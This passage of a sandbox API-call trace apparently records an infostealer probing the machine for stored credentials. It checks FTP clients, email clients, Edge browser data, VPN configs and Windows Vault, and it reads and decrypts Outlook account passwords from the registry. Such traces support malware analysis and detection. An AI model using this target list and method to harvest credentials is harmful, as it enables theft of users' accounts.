lpBuffer="") returned 0x16 [0180.929] GetEnvironmentVariableW (in: lpName="programfiles(x86)", lpBuffer=0x19eeec, nSize=0x80 | out: lpBuffer="") returned 0x16 [0180.930] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\jDownloader\\config\\database.script", nBufferLength=0x105, lpBuffer=0x19eb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\jDownloader\\config\\database.script", lpFilePart=0x0) returned 0x39 [0180.931] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19efc0) returned 1 [0180.931] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\jDownloader\\config\\database.script" (normalized: "c:\\program files (x86)\\jdownloader\\config\\database.script"), fInfoLevelId=0x0, lpFileInformation=0x19f03c | out: lpFileInformation=0x19f03c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.931] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19efbc) returned 1 [0180.971] CoTaskMemAlloc (cb=0x20c) returned 0x5ced18 [0180.971] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5ced18 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0180.971] CoTaskMemFree (pv=0x5ced18) [0180.971] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x19eab8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0180.972] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPGetter\\servers.xml", nBufferLength=0x105, lpBuffer=0x19eb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPGetter\\servers.xml", lpFilePart=0x0) returned 0x3b [0180.972] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19eff8) returned 1 [0180.972] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPGetter\\servers.xml" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\ftpgetter\\servers.xml"), fInfoLevelId=0x0, lpFileInformation=0x19f074 | out: lpFileInformation=0x19f074*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.972] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19eff4) returned 1 [0180.983] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x20019, phkResult=0x19eff8 | out: phkResult=0x19eff8*=0x0) returned 0x2 [0180.984] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x20019, phkResult=0x19eff8 | out: phkResult=0x19eff8*=0x0) returned 0x2 [0180.985] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x20019, phkResult=0x19eff8 | out: phkResult=0x19eff8*=0x0) returned 0x2 [0180.986] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x20019, phkResult=0x19eff8 | out: phkResult=0x19eff8*=0x4b4) returned 0x0 [0180.986] RegQueryInfoKeyW (in: hKey=0x4b4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x19f020, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x19f01c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x19f020*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x19f01c*=0x6, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0180.986] RegEnumKeyExW (in: hKey=0x4b4, dwIndex=0x0, lpName=0x233ce50, lpcchName=0x19f03c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="00000001", lpcchName=0x19f03c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0180.986] RegEnumKeyExW (in: hKey=0x4b4, dwIndex=0x1, lpName=0x233ce50, lpcchName=0x19f03c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="00000002", lpcchName=0x19f03c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0180.987] RegEnumKeyExW (in: hKey=0x4b4, dwIndex=0x2, lpName=0x233ce50, lpcchName=0x19f03c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="00000003", lpcchName=0x19f03c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0180.987] RegOpenKeyExW (in: hKey=0x4b4, lpSubKey="00000001", ulOptions=0x0, samDesired=0x20019, phkResult=0x19eff8 | out: phkResult=0x19eff8*=0x4b8) returned 0x0 [0180.987] RegQueryValueExW (in: hKey=0x4b8, lpValueName="Email", lpReserved=0x0, lpType=0x19f018, lpData=0x0, lpcbData=0x19f014*=0x0 | out: lpType=0x19f018*=0x0, lpData=0x0, lpcbData=0x19f014*=0x0) returned 0x2 [0180.988] RegQueryValueExW (in: hKey=0x4b8, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x19f018, lpData=0x0, lpcbData=0x19f014*=0x0 | out: lpType=0x19f018*=0x0, lpData=0x0, lpcbData=0x19f014*=0x0) returned 0x2 [0180.989] RegQueryValueExW (in: hKey=0x4b8, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x19f018, lpData=0x0, lpcbData=0x19f014*=0x0 | out: lpType=0x19f018*=0x0, lpData=0x0, lpcbData=0x19f014*=0x0) returned 0x2 [0180.990] RegQueryValueExW (in: hKey=0x4b8, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x19f018, lpData=0x0, lpcbData=0x19f014*=0x0 | out: lpType=0x19f018*=0x0, lpData=0x0, lpcbData=0x19f014*=0x0) returned 0x2 [0180.991] RegQueryValueExW (in: hKey=0x4b8, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x19f018, lpData=0x0, lpcbData=0x19f014*=0x0 | out: lpType=0x19f018*=0x0, lpData=0x0, lpcbData=0x19f014*=0x0) returned 0x2 [0180.991] RegCloseKey (hKey=0x4b8) returned 0x0 [0180.991] RegOpenKeyExW (in: hKey=0x4b4, lpSubKey="00000002", ulOptions=0x0, samDesired=0x20019, phkResult=0x19eff8 | out: phkResult=0x19eff8*=0x4b8) returned 0x0 [0180.991] RegQueryValueExW (in: hKey=0x4b8, lpValueName="Email", lpReserved=0x0, lpType=0x19f018, lpData=0x0, lpcbData=0x19f014*=0x0 | out: lpType=0x19f018*=0x1, lpData=0x0, lpcbData=0x19f014*=0x1e) returned 0x0 [0180.991] RegQueryValueExW (in: hKey=0x4b8, lpValueName="Email", lpReserved=0x0, lpType=0x19f018, lpData=0x233d444, lpcbData=0x19f014*=0x1e | out: lpType=0x19f018*=0x1, lpData="achoo@gdllo.de", lpcbData=0x19f014*=0x1e) returned 0x0 [0180.991] RegQueryValueExW (in: hKey=0x4b8, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x19f018, lpData=0x0, lpcbData=0x19f014*=0x0 | out: lpType=0x19f018*=0x0, lpData=0x0, lpcbData=0x19f014*=0x0) returned 0x2 [0180.991] RegQueryValueExW (in: hKey=0x4b8, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x19f018, lpData=0x0, lpcbData=0x19f014*=0x0 | out: lpType=0x19f018*=0x3, lpData=0x0, lpcbData=0x19f014*=0x121) returned 0x0 [0180.991] RegQueryValueExW (in: hKey=0x4b8, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x19f018, lpData=0x233d49c, lpcbData=0x19f014*=0x121 | out: lpType=0x19f018*=0x3, lpData=0x233d49c*, lpcbData=0x19f014*=0x121) returned 0x0 [0180.991] RegQueryValueExW (in: hKey=0x4b8, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x19f018, lpData=0x0, lpcbData=0x19f014*=0x0 | out: lpType=0x19f018*=0x0, lpData=0x0, lpcbData=0x19f014*=0x0) returned 0x2 [0180.991] RegQueryValueExW (in: hKey=0x4b8, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x19f018, lpData=0x0, lpcbData=0x19f014*=0x0 | out: lpType=0x19f018*=0x0, lpData=0x0, lpcbData=0x19f014*=0x0) returned 0x2 [0180.991] RegQueryValueExW (in: hKey=0x4b8, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x19f018, lpData=0x0, lpcbData=0x19f014*=0x0 | out: lpType=0x19f018*=0x0, lpData=0x0, lpcbData=0x19f014*=0x0) returned 0x2 [0180.991] RegQueryValueExW (in: hKey=0x4b8, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x19f018, lpData=0x0, lpcbData=0x19f014*=0x0 | out: lpType=0x19f018*=0x3, lpData=0x0, lpcbData=0x19f014*=0x121) returned 0x0 [0180.991] RegQueryValueExW (in: hKey=0x4b8, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x19f018, lpData=0x233d600, lpcbData=0x19f014*=0x121 | out: lpType=0x19f018*=0x3, lpData=0x233d600*, lpcbData=0x19f014*=0x121) returned 0x0 [0180.991] RegQueryValueExW (in: hKey=0x4b8, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x19f018, lpData=0x0, lpcbData=0x19f014*=0x0 | out: lpType=0x19f018*=0x3, lpData=0x0, lpcbData=0x19f014*=0x121) returned 0x0 [0180.991] RegQueryValueExW (in: hKey=0x4b8, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x19f018, lpData=0x233d730, lpcbData=0x19f014*=0x121 | out: lpType=0x19f018*=0x3, lpData=0x233d730*, lpcbData=0x19f014*=0x121) returned 0x0 [0181.151] CryptUnprotectData (in: pDataIn=0x19f000, ppszDataDescr=0x0, pOptionalEntropy=0x19eff8, pvReserved=0x0, pPromptStruct=0x0, dwFlags=0x1, pDataOut=0x19f008 | out: ppszDataDescr=0x0, pDataOut=0x19f008) returned 1 [0181.158] LocalFree (hMem=0x580a40) returned 0x0 [0181.159] RegQueryValueExW (in: hKey=0x4b8, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x19f018, lpData=0x0, lpcbData=0x19f014*=0x0 | out: lpType=0x19f018*=0x0, lpData=0x0, lpcbData=0x19f014*=0x0) returned 0x2 [0181.159] RegQueryValueExW (in: hKey=0x4b8, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x19f018, lpData=0x0, lpcbData=0x19f014*=0x0 | out: lpType=0x19f018*=0x0, lpData=0x0, lpcbData=0x19f014*=0x0) returned 0x2 [0181.159] RegQueryValueExW (in: hKey=0x4b8, lpValueName="Email", lpReserved=0x0, lpType=0x19f018, lpData=0x0, lpcbData=0x19f014*=0x0 | out: lpType=0x19f018*=0x1, lpData=0x0, lpcbData=0x19f014*=0x1e) returned 0x0 [0181.159] RegQueryValueExW (in: hKey=0x4b8, lpValueName="Email", lpReserved=0x0, lpType=0x19f018, lpData=0x233da60, lpcbData=0x19f014*=0x1e | out: lpType=0x19f018*=0x1, lpData="achoo@gdllo.de", lpcbData=0x19f014*=0x1e) returned 0x0 [0181.161] RegQueryValueExW (in: hKey=0x4b8, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x19f018, lpData=0x0, lpcbData=0x19f014*=0x0 | out: lpType=0x19f018*=0x1, lpData=0x0, lpcbData=0x19f014*=0x1c) returned 0x0 [0181.161] RegQueryValueExW (in: hKey=0x4b8, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x19f018, lpData=0x233dadc, lpcbData=0x19f014*=0x1c | out: lpType=0x19f018*=0x1, lpData="smtp.gdllo.de", lpcbData=0x19f014*=0x1c) returned 0x0 [0181.161] RegQueryValueExW (in: hKey=0x4b8, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x19f018, lpData=0x0, lpcbData=0x19f014*=0x0 | out: lpType=0x19f018*=0x1, lpData=0x0, lpcbData=0x19f014*=0x1c) returned 0x0 [0181.161] RegQueryValueExW (in: hKey=0x4b8, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x19f018, lpData=0x233db2c, lpcbData=0x19f014*=0x1c | out: lpType=0x19f018*=0x1, lpData="smtp.gdllo.de", lpcbData=0x19f014*=0x1c) returned 0x0 [0181.168] RegCloseKey (hKey=0x4b8) returned 0x0 [0181.168] RegOpenKeyExW (in: hKey=0x4b4, lpSubKey="00000003", ulOptions=0x0, samDesired=0x20019, phkResult=0x19eff8 | out: phkResult=0x19eff8*=0x4b8) returned 0x0 [0181.169] RegQueryValueExW (in: hKey=0x4b8, lpValueName="Email", lpReserved=0x0, lpType=0x19f018, lpData=0x0, lpcbData=0x19f014*=0x0 | out: lpType=0x19f018*=0x0, lpData=0x0, lpcbData=0x19f014*=0x0) returned 0x2 [0181.169] RegQueryValueExW (in: hKey=0x4b8, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x19f018, lpData=0x0, lpcbData=0x19f014*=0x0 | out: lpType=0x19f018*=0x0, lpData=0x0, lpcbData=0x19f014*=0x0) returned 0x2 [0181.169] RegQueryValueExW (in: hKey=0x4b8, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x19f018, lpData=0x0, lpcbData=0x19f014*=0x0 | out: lpType=0x19f018*=0x0, lpData=0x0, lpcbData=0x19f014*=0x0) returned 0x2 [0181.169] RegQueryValueExW (in: hKey=0x4b8, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x19f018, lpData=0x0, lpcbData=0x19f014*=0x0 | out: lpType=0x19f018*=0x0, lpData=0x0, lpcbData=0x19f014*=0x0) returned 0x2 [0181.169] RegQueryValueExW (in: hKey=0x4b8, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x19f018, lpData=0x0, lpcbData=0x19f014*=0x0 | out: lpType=0x19f018*=0x0, lpData=0x0, lpcbData=0x19f014*=0x0) returned 0x2 [0181.169] RegCloseKey (hKey=0x4b8) returned 0x0 [0181.176] CoTaskMemAlloc (cb=0x20c) returned 0x5ced18 [0181.176] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x5ced18 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0181.178] CoTaskMemFree (pv=0x5ced18) [0181.178] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x105, lpBuffer=0x19ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)", lpFilePart=0x0) returned 0x16 [0181.179] CoTaskMemAlloc (cb=0x20c) returned 0x5ced18 [0181.179] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5ced18 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0181.179] CoTaskMemFree (pv=0x5ced18) [0181.179] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x19ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0181.198] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Apple\\Apple Application Support\\plutil.exe", nBufferLength=0x105, lpBuffer=0x19eb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Apple\\Apple Application Support\\plutil.exe", lpFilePart=0x0) returned 0x4e [0181.198] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19efe0) returned 1 [0181.198] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Apple\\Apple Application Support\\plutil.exe" (normalized: "c:\\program files (x86)\\common files\\apple\\apple application support\\plutil.exe"), fInfoLevelId=0x0, lpFileInformation=0x19f05c | out: lpFileInformation=0x19f05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0181.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19efdc) returned 1 [0181.273] CoTaskMemAlloc (cb=0x20c) returned 0x5ced18 [0181.273] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x5ced18 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0181.274] CoTaskMemFree (pv=0x5ced18) [0181.274] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x19e8dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0181.274] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data", nBufferLength=0x105, lpBuffer=0x19e950, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data", lpFilePart=0x0) returned 0x3c [0181.274] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19edf4) returned 1 [0181.274] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\edge\\user data"), fInfoLevelId=0x0, lpFileInformation=0x19ee70 | out: lpFileInformation=0x19ee70*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0181.274] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19edf0) returned 1 [0182.209] VaultEnumerateVaults () returned 0x0 [0182.268] VaultOpenVault () returned 0x0 [0182.281] VaultEnumerateItems () returned 0x0 [0182.282] VaultOpenVault () returned 0x0 [0182.283] VaultEnumerateItems () returned 0x0 [0182.315] ExpandEnvironmentStringsW (in: lpSrc="%ProgramW6432%", lpDst=0x19ef60, nSize=0x64 | out: lpDst="C:\\Program Files") returned 0x11 [0182.315] ExpandEnvironmentStringsW (in: lpSrc="%ProgramW6432%", lpDst=0x19ef60, nSize=0x64 | out: lpDst="C:\\Program Files") returned 0x11 [0182.319] GetEnvironmentVariableW (in: lpName="ProgramFiles(x86)", lpBuffer=0x19ef44, nSize=0x80 | out: lpBuffer="") returned 0x16 [0182.320] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Private Internet Access\\data", nBufferLength=0x105, lpBuffer=0x19eb58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Private Internet Access\\data", lpFilePart=0x0) returned 0x2d [0182.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19effc) returned 1 [0182.320] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Private Internet Access\\data" (normalized: "c:\\program files\\private internet access\\data"), fInfoLevelId=0x0, lpFileInformation=0x19f078 | out: lpFileInformation=0x19f078*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0182.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19eff8) returned 1 [0182.321] GetFullPathNameW (in: lpFileName="\\Private Internet Access\\data", nBufferLength=0x105, lpBuffer=0x19eb58, lpFilePart=0x0 | out: lpBuffer="C:\\Private Internet Access\\data", lpFilePart=0x0) returned 0x1f [0182.321] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19effc) returned 1 [0182.321] GetFileAttributesExW (in: lpFileName="C:\\Private Internet Access\\data" (normalized: "c:\\private internet access\\data"), fInfoLevelId=0x0, lpFileInformation=0x19f078 | out: lpFileInformation=0x19f078*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0182.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19eff8) returned 1 [0182.331] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\OpenVPN-GUI\\configs", ulOptions=0x0, samDesired=0x2001f, phkResult=0x19f068 | out: phkResult=0x19f068*=0x0) returned 0x2 [0182.376] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0182.376] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x5b20c8 | out: pszPath="C:\\ProgramData") returned 0x0 [0182.379] CoTaskMemFree (pv=0x5b20c8) [0182.380] GetFullPathNameW (in: lpFileName="C:\\ProgramData", nBufferLength=0x105, lpBuffer=0x19ea1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData", lpFilePart=0x0) returned 0xe [0182.382] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0182.382] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5b20c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0182.382] CoTaskMemFree (pv=0x5b20c8) [0182.383] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x19ea1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0182.383] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\FlashFXP\\", nBufferLength=0x105, lpBuffer=0x19eaac, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\FlashFXP\\", lpFilePart=0x0) returned 0x18 [0182.383] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef50) returned 1 [0182.383] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\FlashFXP\\" (normalized: "c:\\programdata\\flashfxp"), fInfoLevelId=0x0, lpFileInformation=0x19efcc | out: lpFileInformation=0x19efcc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0182.383] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef4c) returned 1 [0182.383] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP\\", nBufferLength=0x105, lpBuffer=0x19eaac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP\\", lpFilePart=0x0) returned 0x2f [0182.383] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef50) returned 1 [0182.383] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\flashfxp"), fInfoLevelId=0x0, lpFileInformation=0x19efcc | out: lpFileInformation=0x19efcc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0182.384] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef4c) returned 1 [0182.401] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\RimArts\\B2\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f01c | out: phkResult=0x19f01c*=0x0) returned 0x2 [0182.402] GetFullPathNameW (in: lpFileName="Folder.lst", nBufferLength=0x105, lpBuffer=0x19eb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Folder.lst", lpFilePart=0x0) returned 0x1e [0182.402] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19efe8) returned 1 [0182.403] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\Folder.lst" (normalized: "c:\\windows\\syswow64\\folder.lst"), fInfoLevelId=0x0, lpFileInformation=0x19f064 | out: lpFileInformation=0x19f064*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0182.403] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19efe4) returned 1 [0182.410] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0182.410] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5b20c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0182.410] CoTaskMemFree (pv=0x5b20c8) [0182.410] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x19eab8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0182.411] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0182.411] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5b20c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0182.411] CoTaskMemFree (pv=0x5b20c8) [0182.411] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x19eab8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0182.412] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\eM Client", nBufferLength=0x105, lpBuffer=0x19eb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\eM Client", lpFilePart=0x0) returned 0x2f [0182.412] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19efec) returned 1 [0182.413] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\eM Client" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\em client"), fInfoLevelId=0x0, lpFileInformation=0x19f068 | out: lpFileInformation=0x19f068*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0182.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19efe8) returned 1 [0182.416] GetFullPathNameW (in: 